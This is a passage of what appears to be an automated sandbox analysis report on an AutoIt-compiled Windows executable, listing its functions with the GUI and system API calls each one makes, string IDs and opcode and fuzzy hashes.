                                                    • Instruction ID: 92ea5d8aa677acec8985e1d68fbab57cda29e890a343f75a6dd0cae631a05617
                                                    • Opcode Fuzzy Hash: 650cdca49451b9588e1f598a95ac9f23938fca59fb5c5a93d7f92b973b3914a1
                                                    • Instruction Fuzzy Hash: 61A19F76008301BFE7109FA4DC08E6BBBA9FF89321F104A2AF562961E1C775D949CB56
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004377BE, Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 293windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DestroyWindow.USER32(00000000), ref: 004377F1
                                                    • SystemParametersInfoW.USER32 ref: 004378B0
                                                    • SetRect.USER32 ref: 004378EE
                                                    • AdjustWindowRectEx.USER32(?,88C00000,?,00000006), ref: 00437900
                                                    • CreateWindowExW.USER32 ref: 00437946
                                                    • GetClientRect.USER32 ref: 00437952
                                                    • CreateWindowExW.USER32 ref: 00437996
                                                    • CreateDCW.GDI32(DISPLAY,?,?,?), ref: 004379A5
                                                    • GetStockObject.GDI32(00000011), ref: 004379B5
                                                    • SelectObject.GDI32(00000000,00000000), ref: 004379B9
                                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,?,?,?,?,88C00000,?), ref: 004379C9
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004379D2
                                                    • DeleteDC.GDI32(00000000), ref: 004379DB
                                                    • CreateFontW.GDI32(?,?,?,?,00000258,?,?,?,00000001,00000004,?,00000002,?,?,?,50000000), ref: 00437A07
                                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 00437A1E
                                                    • CreateWindowExW.USER32 ref: 00437A59
                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00437A6D
                                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 00437A7E
                                                    • CreateWindowExW.USER32 ref: 00437AAE
                                                    • GetStockObject.GDI32(00000011), ref: 00437AB9
                                                    • SendMessageW.USER32(00000030,00000000,?,static), ref: 00437AC4
                                                    • ShowWindow.USER32(00000004,?,static,?,50000000,?,00000037,00000500,00000032,?,?,?,?,50000000,?,00000004), ref: 00437ACE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                    • API String ID: 2910397461-517079104
                                                    • Opcode ID: 52ad5331cda47b64aaaf25f36abcfe4e325d5d85152e18a411f8410947049648
                                                    • Instruction ID: bab8e80d6b8e765bd4d04c44bc03034b100db4896827585ecd6c26fdb1542aa1
                                                    • Opcode Fuzzy Hash: 52ad5331cda47b64aaaf25f36abcfe4e325d5d85152e18a411f8410947049648
                                                    • Instruction Fuzzy Hash: A3A19FB1A00205BFEB149FA4DD4AFAF7B79EB45710F118169FA14AA1E0C774AD00CB64
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0042AF7B, Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 0042AF89
                                                    • GetDriveTypeW.KERNEL32(?,0044FAC0,?,\\.\,0044F910), ref: 0042B066
                                                    • SetErrorMode.KERNEL32(00000000,0044FAC0,?,\\.\,0044F910), ref: 0042B1C4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: ErrorMode$DriveType
                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                    • API String ID: 2907320926-4222207086
                                                    • Opcode ID: cfd9ff727671ab08b8fbff0834a19654907e8af5b355a06887486b0fe5d34ef9
                                                    • Instruction ID: a9cda6e4f0fb85c70ffbc8ab44686142d24fd23638685564d5dc3068f9900291
                                                    • Opcode Fuzzy Hash: cfd9ff727671ab08b8fbff0834a19654907e8af5b355a06887486b0fe5d34ef9
                                                    • Instruction Fuzzy Hash: 5851A630744715AB8B05DB10E952EBD73B0EB947817B0801BE40AAB290C77DED66DB8F
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00449C8B, Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 463windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00449D41
                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00449DFA
                                                    • SendMessageW.USER32(?,00001102,00000002,?), ref: 00449E16
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: MessageSend$Window
                                                    • String ID: 0
                                                    • API String ID: 2326795674-4108050209
                                                    • Opcode ID: 1118deb2639cc8fc0c9ee7d20cb1a675747b0e2c1f306aa45942b477ae930fab
                                                    • Instruction ID: 0e4b8f6f9728dede4218d3bee41bf4638b4e3190b49ce566faeb625a25e345b7
                                                    • Opcode Fuzzy Hash: 1118deb2639cc8fc0c9ee7d20cb1a675747b0e2c1f306aa45942b477ae930fab
                                                    • Instruction Fuzzy Hash: 1302EE30109201AFE715CF24C848BABBBE4FF49314F04892EF599963A1C779DC59DB9A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0044AB60, Relevance: 39.2, APIs: 26, Instructions: 207windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSysColor.USER32(00000012), ref: 0044AB99
                                                    • SetTextColor.GDI32(?,0044A869), ref: 0044AB9D
                                                    • GetSysColorBrush.USER32(0000000F), ref: 0044ABB3
                                                    • GetSysColor.USER32(0000000F), ref: 0044ABBE
                                                    • CreateSolidBrush.GDI32(?), ref: 0044ABC3
                                                    • GetSysColor.USER32(00000011), ref: 0044ABDB
                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0044ABE9
                                                    • SelectObject.GDI32(?,00000000), ref: 0044ABFA
                                                    • SetBkColor.GDI32(?,?), ref: 0044AC03
                                                    • SelectObject.GDI32(?,?), ref: 0044AC10
                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 0044AC2F
                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0044AC46
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0044AC5B
                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0044ACA7
                                                    • GetWindowTextW.USER32 ref: 0044ACCE
                                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 0044ACEC
                                                    • DrawFocusRect.USER32 ref: 0044ACF7
                                                    • GetSysColor.USER32(00000011), ref: 0044AD05
                                                    • SetTextColor.GDI32(?,00000000), ref: 0044AD0D
                                                    • DrawTextW.USER32(?,?,000000FF,?,?), ref: 0044AD21
                                                    • SelectObject.GDI32(?,?), ref: 0044AD38
                                                    • DeleteObject.GDI32(?), ref: 0044AD43
                                                    • SelectObject.GDI32(?,?), ref: 0044AD49
                                                    • DeleteObject.GDI32(?), ref: 0044AD4E
                                                    • SetTextColor.GDI32(?,?), ref: 0044AD54
                                                    • SetBkColor.GDI32(?,?), ref: 0044AD5E
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                    • String ID:
                                                    • API String ID: 1996641542-0
                                                    • Opcode ID: 357c0ab86891208dbc8e64b440f51eab75452ed885c9a0a50f6fe3df521fce48
                                                    • Instruction ID: bd6c48ec3f7a91b8519c20372bad421aca3be3d6fb06e73b1405af7366f773d8
                                                    • Opcode Fuzzy Hash: 357c0ab86891208dbc8e64b440f51eab75452ed885c9a0a50f6fe3df521fce48
                                                    • Instruction Fuzzy Hash: CF618E76900218FFEB119FA4DC48EAEBB79EB09320F214126F911AB2A1C6759D50CF94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00444B16, Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCursorPos.USER32(?), ref: 00444C51
                                                    • GetDesktopWindow.USER32 ref: 00444C66
                                                    • GetWindowRect.USER32 ref: 00444C6D
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00444CCF
                                                    • DestroyWindow.USER32(?), ref: 00444CFB
                                                    • CreateWindowExW.USER32 ref: 00444D24
                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00444D42
                                                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00444D68
                                                    • SendMessageW.USER32(?,00000421,?,?), ref: 00444D7D
                                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00444D90
                                                    • IsWindowVisible.USER32 ref: 00444DB0
                                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00444DCB
                                                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00444DDF
                                                    • GetWindowRect.USER32 ref: 00444DF7
                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00444E1D
                                                    • GetMonitorInfoW.USER32 ref: 00444E37
                                                    • CopyRect.USER32 ref: 00444E4E
                                                    • SendMessageW.USER32(?,00000412,00000000), ref: 00444EB9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                    • String ID: ($0$tooltips_class32
                                                    • API String ID: 698492251-4156429822
                                                    • Opcode ID: e496f963e1da766474b25f24eeab3cbde44f01f1be8ed342719a6e117d8a9f89
                                                    • Instruction ID: 5a0d3c7d829847fa54273c4a7dfd5c1db239fda0c61d9fe324f6f93891c8208c
                                                    • Opcode Fuzzy Hash: e496f963e1da766474b25f24eeab3cbde44f01f1be8ed342719a6e117d8a9f89
                                                    • Instruction Fuzzy Hash: 71B16A71604341AFEB04DF64C849B5BBBE4BF85310F01892EF599AB2A1DB74EC05CB99
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C27D9, Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 292windowtimeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SystemParametersInfoW.USER32 ref: 003C28BC
                                                    • GetSystemMetrics.USER32 ref: 003C28C4
                                                    • SystemParametersInfoW.USER32 ref: 003C28EF
                                                    • GetSystemMetrics.USER32 ref: 003C28F7
                                                    • GetSystemMetrics.USER32 ref: 003C291C
                                                    • SetRect.USER32 ref: 003C2939
                                                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 003C2949
                                                    • CreateWindowExW.USER32 ref: 003C297C
                                                    • SetWindowLongW.USER32 ref: 003C2990
                                                    • GetClientRect.USER32 ref: 003C29AE
                                                    • GetStockObject.GDI32(00000011), ref: 003C29CA
                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 003C29D5
                                                      • Part of subcall function 003C2344: GetCursorPos.USER32(?,?,004867B0,?,004867B0,004867B0,?,0044C247,00000000,00000001,?,?,?,003FBC4F,?,?), ref: 003C2357
                                                      • Part of subcall function 003C2344: ScreenToClient.USER32 ref: 003C2374
                                                      • Part of subcall function 003C2344: GetAsyncKeyState.USER32(00000001), ref: 003C2399
                                                      • Part of subcall function 003C2344: GetAsyncKeyState.USER32(00000002), ref: 003C23A7
                                                    • SetTimer.USER32(00000000,00000000,00000028,003C1256), ref: 003C29FC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                    • String ID: AutoIt v3 GUI
                                                    • API String ID: 1458621304-248962490
                                                    • Opcode ID: 1d6f5ce0d56239fd472a5d6733d70478939c1782393a53b0022213ac236a9ba3
                                                    • Instruction ID: 9cadfeea5e0c32ab1747051df8a04f5af105c2c9093a4f9d662a2b7812735c9f
                                                    • Opcode Fuzzy Hash: 1d6f5ce0d56239fd472a5d6733d70478939c1782393a53b0022213ac236a9ba3
                                                    • Instruction Fuzzy Hash: 8FB18E75A0020AEFDB15DFA8DD45FAE7BB4FB08314F11862AFA15E6290DB74AC40CB54
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00448C44, Relevance: 28.9, APIs: 19, Instructions: 404windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00448D34
                                                    • SendMessageW.USER32(?,0000014E,00000000,?), ref: 00448D45
                                                    • CharNextW.USER32(0000014E,?,?,004301B4,00000000,?,?), ref: 00448D74
                                                    • SendMessageW.USER32(?,0000014B,?,?), ref: 00448DB5
                                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00448DCB
                                                    • SendMessageW.USER32(?,0000014E,00000000,?), ref: 00448DDC
                                                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00448DF9
                                                    • SetWindowTextW.USER32(?,0000014E), ref: 00448E45
                                                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00448E5B
                                                    • SendMessageW.USER32(?,00001002,?,?), ref: 00448E8C
                                                    • SendMessageW.USER32(00000000,00001060,?,00000004), ref: 00448EFA
                                                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00448F83
                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 00448FDB
                                                    • SendMessageW.USER32(?,0000133D,?,?), ref: 00449088
                                                    • InvalidateRect.USER32(00000002,?,00000001), ref: 004490AA
                                                    • GetMenuItemInfoW.USER32(0000014E,00000002,?,00000030), ref: 004490F4
                                                    • SetMenuItemInfoW.USER32 ref: 00449121
                                                    • DrawMenuBar.USER32(00000002), ref: 00449130
                                                    • SetWindowTextW.USER32(?,0000014E), ref: 00449158
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: MessageSend$Menu$InfoItemTextWindow$CharDrawInvalidateNextRect
                                                    • String ID:
                                                    • API String ID: 1015379403-0
                                                    • Opcode ID: a85e0b7850a6a685b9a2e7afac8d9ad47fc265982b6083e518e1659175eb76b9
                                                    • Instruction ID: a94c9d416913012e6874c515185e745cb1d339b357145336f487f157f808e79c
                                                    • Opcode Fuzzy Hash: a85e0b7850a6a685b9a2e7afac8d9ad47fc265982b6083e518e1659175eb76b9
                                                    • Instruction Fuzzy Hash: BDE1C474901219AFEF119F50CC88EEF7BB8FF05310F10816AF9159A291DB748A86DF69
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00444069, Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?,?), ref: 004440F6
                                                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 004441B6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: BuffCharMessageSendUpper
                                                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                    • API String ID: 3974292440-719923060
                                                    • Opcode ID: f8d8e4e3a55803e0d939fc8e91d81040da52ab5c32dbf93e605ea672ec13c589
                                                    • Instruction ID: 72d24f1e89e87c2b00e8cc08bfcfc6178f2f6612822571b17004b5ffc6e04139
                                                    • Opcode Fuzzy Hash: f8d8e4e3a55803e0d939fc8e91d81040da52ab5c32dbf93e605ea672ec13c589
                                                    • Instruction Fuzzy Hash: 85A1AE302142019BDB14EF20C955F6AB3A5BF84314F11896EB89A9F3D2DB78EC46CB46
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004352F0, Relevance: 27.1, APIs: 18, Instructions: 124COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 00435309
                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 00435314
                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0043531F
                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 0043532A
                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 00435335
                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 00435340
                                                    • LoadCursorW.USER32(00000000,00007F81), ref: 0043534B
                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 00435356
                                                    • LoadCursorW.USER32(00000000,00007F80), ref: 00435361
                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 0043536C
                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 00435377
                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 00435382
                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 0043538D
                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 00435398
                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 004353A3
                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 004353AE
                                                    • GetCursorInfo.USER32(?), ref: 004353BE
                                                    • GetLastError.KERNEL32(00000001,00000000), ref: 004353E9
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Cursor$Load$ErrorInfoLast
                                                    • String ID:
                                                    • API String ID: 3215588206-0
                                                    • Opcode ID: 4ba0ce702d1f49607e24d3b68a7d8dbdd9cb96e96e3e3bd474bc51d4d380d9fb
                                                    • Instruction ID: 7e9724619375f54a1db4bb4e8bb7115b2869acc7c92c3d8d7a4778aec93a8012
                                                    • Opcode Fuzzy Hash: 4ba0ce702d1f49607e24d3b68a7d8dbdd9cb96e96e3e3bd474bc51d4d380d9fb
                                                    • Instruction Fuzzy Hash: 7A418170E04319AADB109FBA8C49D6FFFB8EF55B10F10452FA509E7291DAB8A4018E65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041C4C1, Relevance: 25.7, APIs: 17, Instructions: 174windowtimeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadIconW.USER32(00000063), ref: 0041C4D4
                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0041C4E6
                                                    • SetWindowTextW.USER32(?,?), ref: 0041C4FD
                                                    • GetDlgItem.USER32 ref: 0041C512
                                                    • SetWindowTextW.USER32(00000000,?), ref: 0041C518
                                                    • GetDlgItem.USER32 ref: 0041C528
                                                    • SetWindowTextW.USER32(00000000,?), ref: 0041C52E
                                                    • SendDlgItemMessageW.USER32 ref: 0041C54F
                                                    • SendDlgItemMessageW.USER32 ref: 0041C569
                                                    • GetWindowRect.USER32 ref: 0041C572
                                                    • SetWindowTextW.USER32(?,?), ref: 0041C5DD
                                                    • GetDesktopWindow.USER32 ref: 0041C5E3
                                                    • GetWindowRect.USER32 ref: 0041C5EA
                                                    • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0041C636
                                                    • GetClientRect.USER32 ref: 0041C643
                                                    • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0041C668
                                                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0041C693
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                    • String ID:
                                                    • API String ID: 3869813825-0
                                                    • Opcode ID: 6bf938e9c2aa415fb63668c9566335e902ce955401be740febd9aba2790bf6bd
                                                    • Instruction ID: b3b069f8950ef9c256a66029821dd94e96dd27248411121ebf75e57a5550439b
                                                    • Opcode Fuzzy Hash: 6bf938e9c2aa415fb63668c9566335e902ce955401be740febd9aba2790bf6bd
                                                    • Instruction Fuzzy Hash: 5D51B171900709AFDB20DFA8DE85FAFBBB5FF04705F000529E682A25A0C778B945CB58
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0044C8EE, Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 187windowfileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 003C2612: GetWindowLongW.USER32(?,000000EB), ref: 003C2623
                                                    • DragQueryPoint.SHELL32(?,?), ref: 0044C917
                                                      • Part of subcall function 0044ADF1: ClientToScreen.USER32(?,?), ref: 0044AE1A
                                                      • Part of subcall function 0044ADF1: GetWindowRect.USER32 ref: 0044AE90
                                                      • Part of subcall function 0044ADF1: PtInRect.USER32(?,?,?), ref: 0044AEA0
                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0044C980
                                                    • DragQueryFileW.SHELL32(?,000000FF,?,?), ref: 0044C98B
                                                    • DragQueryFileW.SHELL32(?,?,?,00000104), ref: 0044C9AE
                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044C9F5
                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0044CA0E
                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0044CA25
                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0044CA47
                                                    • DragFinish.SHELL32(?), ref: 0044CA4E
                                                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0044CB41
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$prH
                                                    • API String ID: 221274066-2884536810
                                                    • Opcode ID: ebdd59d153e98f723528211c0142a6ba76be5dbd57d216915447198b50a49d58
                                                    • Instruction ID: 95fbb461333640cf4796862b6ed1fa7cacdab5ee8b536e75b065a6ca24d635fc
                                                    • Opcode Fuzzy Hash: ebdd59d153e98f723528211c0142a6ba76be5dbd57d216915447198b50a49d58
                                                    • Instruction Fuzzy Hash: 2A618F72109300AFD701EF60DC85E9FBBE8FF89350F04092EF595961A1DB71AA49CB56
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00444619, Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?), ref: 004446AB
                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 004446F6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: BuffCharMessageSendUpper
                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                    • API String ID: 3974292440-4258414348
                                                    • Opcode ID: 7f51b98ad23ac4969c8cd5e481943e7d086ef8c1f6e4450c7ac4d9fe67dfa88e
                                                    • Instruction ID: 57e7bf956104b8e6a5bb38a8d82485a56c7c4bb65ecc80124365527a610384a9
